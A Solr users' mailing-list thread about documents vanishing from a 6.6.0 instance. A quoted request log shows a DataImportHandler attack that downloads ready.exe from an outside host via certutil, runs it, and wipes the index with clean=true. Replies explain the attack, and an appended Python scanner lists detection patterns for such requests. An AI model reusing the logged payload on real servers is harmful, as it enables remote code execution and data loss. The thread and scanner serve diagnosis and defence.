URGENT Documents automatically getting deleted in SOLR 6.6.0

Neha-2
Hello SOLR Users,

Today I have noticed that in my SOLR 6.6.0 instance documents are
getting automatically deleted.

In the SOLR traces I found the lines below, and it seems this is the cause.


2019-09-26 09:01:21.599 INFO  (qtp225493257-14) [   x:Ecotron]
o.a.s.c.S.Request [xyz]  webapp=/solr path=/dataimport
params={cmd.exe+/c+C:/Windows/temp/ready.exe");%0a++++++++++}%0a++]]></script>%0a++<document>%0a++++<entity+name%3D"stackoverflow"%0a++++++++++++url%3D"https://stackoverflow.com/feeds/tag/solr"%0a++++++++++++processor%3D"XPathEntityProcessor"%0a++++++++++++forEach%3D"/feed"%0a++++++++++++transformer%3D"script:poc"+/>%0a++</document>%0a</dataConfig>=&core=atom&debug=true&indent=on&commit=true&name=dataimport&dataConfig=<dataConfig>%0a++<dataSource+type%3D"URLDataSource"/>%0a++<script><![CDATA[%0a++++++++++function+poc(){+java.lang.Runtime.getRuntime().exec("cmd.exe+/c+certutil.exe+-urlcache+-split+-f+http://www.jukesxdbrxd.xyz/ready.exe+C:/Windows/temp/ready.exe&clean=true&wt=json&command=full-import&_=1565530241159&verbose=false}
status=500 QTime=94
2019-09-26 09:01:21.599 ERROR (qtp225493257-14) [   x:Ecotron]
o.a.s.s.HttpSolrCall
null:org.apache.solr.handler.dataimport.DataImportHandlerException: Data
Config problem: XML document structures must start and end within the
same entity.


Also, the "dataimport.properties" file of each core is getting updated
with something like the line below:

*stackoverflow.last_index_time=2019-09-26 08\:24\:11*


Is there some configuration which I am missing? Please help me with
this, as I am clueless why this is happening.

Thanks for your support!!


Regards

Neha Gupta


Re: URGENT Documents automatically getting deleted in SOLR 6.6.0

Shawn Heisey-2
On 9/26/2019 6:42 AM, Neha wrote:
> Today I have noticed that in my SOLR 6.6.0 instance documents are
> getting automatically deleted.
>
> In the SOLR traces I found the lines below, and it seems this is the cause.
>
> 2019-09-26 09:01:21.599 INFO  (qtp225493257-14) [   x:Ecotron]
<snip>

> Also the "dataimport.properties" files of each core is getting updated
> with something like below: -
>
> *stackoverflow.last_index_time=2019-09-26 08\:24\:11*

One of the parameters of your DIH request is "clean=true".  I can see
this in the logged message that contains "o.a.s.c.S.Request".  What this
parameter means is that DIH will delete all documents in the index as
its first step.

There is an error logged, but the fact that dataimport.properties is
being updated suggests that DIH is probably honoring the clean=true
parameter, then throwing the error that says the config is not good.

Thanks,
Shawn

Re: URGENT Documents automatically getting deleted in SOLR 6.6.0

Alexandre Rafalovitch
In reply to this post by Neha-2
Your system is under attack; something is trying to hack into it via
Solr, possibly a cryptominer or similar, and it is using the DIH
endpoint for it.

Shawn explained the most likely cause for Solr actually deleting the
records. I would also suggest:
1) Figure out where the request is coming from and treat it as a
threat. If it is internal, they are infected. If they are external and
consistent, maybe they need to be blocked, etc.
2) Check your system has not been infected already by looking for
weird processes. I guess if you are not on Windows, that particular
line is not a threat, but the attack may have had several methods.
3) If you are not using dataimporthandler, remove that from the
solrconfig.xml. Or rename it (though that will lose the Admin UI
interface). Or firewall-block access to it....

Regards,
   Alex.

On Thu, 26 Sep 2019 at 08:42, Neha <[hidden email]> wrote:

>
> Hello SOLR Users,
>
> Today I have noticed that in my SOLR 6.6.0 instance documents are
> getting automatically deleted.
>
> In the SOLR traces I found the lines below, and it seems this is the cause.
>
>
> 2019-09-26 09:01:21.599 INFO  (qtp225493257-14) [   x:Ecotron]
> o.a.s.c.S.Request [xyz]  webapp=/solr path=/dataimport
> params={cmd.exe+/c+C:/Windows/temp/ready.exe");%0a++++++++++}%0a++]]></script>%0a++<document>%0a++++<entity+name%3D"stackoverflow"%0a++++++++++++url%3D"https://stackoverflow.com/feeds/tag/solr"%0a++++++++++++processor%3D"XPathEntityProcessor"%0a++++++++++++forEach%3D"/feed"%0a++++++++++++transformer%3D"script:poc"+/>%0a++</document>%0a</dataConfig>=&core=atom&debug=true&indent=on&commit=true&name=dataimport&dataConfig=<dataConfig>%0a++<dataSource+type%3D"URLDataSource"/>%0a++<script><![CDATA[%0a++++++++++function+poc(){+java.lang.Runtime.getRuntime().exec("cmd.exe+/c+certutil.exe+-urlcache+-split+-f+http://www.jukesxdbrxd.xyz/ready.exe+C:/Windows/temp/ready.exe&clean=true&wt=json&command=full-import&_=1565530241159&verbose=false}
> status=500 QTime=94
> 2019-09-26 09:01:21.599 ERROR (qtp225493257-14) [   x:Ecotron]
> o.a.s.s.HttpSolrCall
> null:org.apache.solr.handler.dataimport.DataImportHandlerException: Data
> Config problem: XML document structures must start and end within the
> same entity.
>
>
> Also, the "dataimport.properties" file of each core is getting updated
> with something like the line below:
>
> *stackoverflow.last_index_time=2019-09-26 08\:24\:11*
>
>
> Is there some configuration which I am missing? Please help me with
> this, as I am clueless why this is happening.
>
> Thanks for your support!!
>
>
> Regards
>
> Neha Gupta
>
>
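Worked example, added to this thread and not code from the original posts or from the Solr project: a small Python script that turns Shawn's observation (a `clean=true` DIH request wipes the index before importing) and Alex's third suggestion (check whether DIH is still registered in solrconfig.xml) into checks a defender can run. It parses Solr 6.x request-log lines of the shape quoted above, flags `/dataimport` requests that carry `clean=true` or an inline `dataConfig` containing a script transformer, and reports which `requestHandler` entries in a solrconfig.xml point at `DataImportHandler`. The log lines and the solrconfig.xml fragment are constructed samples modelled on the thread (the malicious line keeps the thread's structure but not its download URL); the function names (`parse_request_line`, `assess`, `scan_log`, `dataimport_handlers`) are this example's own. One fact the thread does not state but which the script relies on: DIH's default for `clean` on a full-import is `true`, so a full-import request with no `clean` parameter deletes documents as well.

```python
import re
import xml.etree.ElementTree as ET
from urllib.parse import parse_qs

# Solr 6.x request-log line as written by o.a.s.c.S.Request. It is one
# physical line: newlines inside parameter values are %0a-encoded.
LOG_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}\.\d{3}) (?P<level>\w+)\s+"
    r"\((?P<thread>[^)]*)\) \[(?P<ctx>[^\]]*)\] (?P<logger>\S+) "
    r"\[(?P<core>[^\]]*)\]\s+webapp=(?P<webapp>\S+) path=(?P<path>\S+) "
    r"params=\{(?P<params>.*)\} status=(?P<status>\d+) QTime=(?P<qtime>\d+)$"
)

# Substrings (matched case-insensitively after URL decoding) that mean a
# client-supplied dataConfig carries executable script, not just entities.
SCRIPT_INDICATORS = ("<script", "runtime.getruntime", ".exec(", 'transformer="script:')

# Constructed sample log, modelled on the thread: a normal query, the
# malicious DIH request, and a legitimate DIH run with clean=false.
SAMPLE_LOG = [
    '2019-09-26 09:00:00.000 INFO  (qtp225493257-12) [   x:Ecotron] o.a.s.c.S.Request [Ecotron]  '
    'webapp=/solr path=/select params={q=*:*&wt=json} status=0 QTime=3',
    '2019-09-26 09:01:21.599 INFO  (qtp225493257-14) [   x:Ecotron] o.a.s.c.S.Request [Ecotron]  '
    'webapp=/solr path=/dataimport params={core=atom&debug=true&commit=true&name=dataimport'
    '&dataConfig=<dataConfig>%0a++<dataSource+type%3D"URLDataSource"/>%0a++<script><![CDATA[%0a'
    '++function+poc(){+java.lang.Runtime.getRuntime().exec("cmd.exe+/c+C:/Windows/temp/ready.exe")+}'
    '%0a++]]></script>%0a++<document><entity+name%3D"stackoverflow"'
    '+url%3D"https://stackoverflow.com/feeds/tag/solr"+processor%3D"XPathEntityProcessor"'
    '+forEach%3D"/feed"+transformer%3D"script:poc"/></document>%0a</dataConfig>'
    '&clean=true&wt=json&command=full-import&verbose=false} status=500 QTime=94',
    '2019-09-26 10:15:02.120 INFO  (qtp225493257-20) [   x:Ecotron] o.a.s.c.S.Request [Ecotron]  '
    'webapp=/solr path=/dataimport params={command=full-import&clean=false&commit=true&wt=json} '
    'status=0 QTime=12',
]

# Constructed solrconfig.xml fragment with DIH still registered.
SAMPLE_SOLRCONFIG = """<config>
  <requestHandler name="/select" class="solr.SearchHandler"/>
  <requestHandler name="/dataimport" class="org.apache.solr.handler.dataimport.DataImportHandler">
    <lst name="defaults"><str name="config">data-config.xml</str></lst>
  </requestHandler>
</config>
"""


def parse_request_line(line):
    """Fields of one request-log line with params URL-decoded, or None if not a request line."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    rec = m.groupdict()
    rec["params"] = parse_qs(rec["params"], keep_blank_values=True)
    return rec


def assess(rec):
    """Findings for a /dataimport request as (code, message) tuples; empty for anything else."""
    findings = []
    if rec is None or rec["path"] != "/dataimport":
        return findings
    p = rec["params"]
    command = p.get("command", [""])[0]
    clean = p.get("clean", [None])[0]
    # clean=true makes DIH delete every document before the import starts;
    # for full-import DIH also treats an absent clean parameter as true.
    if clean is not None and clean.lower() == "true":
        findings.append(("CLEAN", "clean=true: the index is wiped before the import runs"))
    elif clean is None and command == "full-import":
        findings.append(("CLEAN", "full-import without clean=false: DIH defaults to clean=true"))
    if "dataConfig" in p:
        findings.append(("INLINE_CONFIG", "dataConfig supplied in the request, not from the server-side file"))
        cfg = p["dataConfig"][0].lower()
        for indicator in SCRIPT_INDICATORS:
            if indicator in cfg:
                findings.append(("SCRIPT", f"script indicator in dataConfig: {indicator!r}"))
    return findings


def scan_log(lines):
    """[(timestamp, core, findings)] for every line that produced at least one finding."""
    hits = []
    for line in lines:
        rec = parse_request_line(line)
        findings = assess(rec)
        if findings:
            hits.append((rec["ts"], rec["core"], findings))
    return hits


def dataimport_handlers(solrconfig_xml):
    """Names of requestHandler entries whose class is the DataImportHandler."""
    root = ET.fromstring(solrconfig_xml)
    return [rh.get("name") for rh in root.iter("requestHandler")
            if (rh.get("class") or "").endswith("DataImportHandler")]


if __name__ == "__main__":
    for ts, core, findings in scan_log(SAMPLE_LOG):
        print(f"{ts} core={core}")
        for code, msg in findings:
            print(f"  [{code}] {msg}")
    print("DIH handlers registered:", dataimport_handlers(SAMPLE_SOLRCONFIG))
```

Run against a real `solr.log`, the script lists only the `/dataimport` requests worth looking at, and the `INLINE_CONFIG` finding is the one to act on first: a client should not be able to hand DIH its configuration in the request at all, which is why removing or blocking the handler, as Alex suggests, closes the door regardless of what the script inside tries to run.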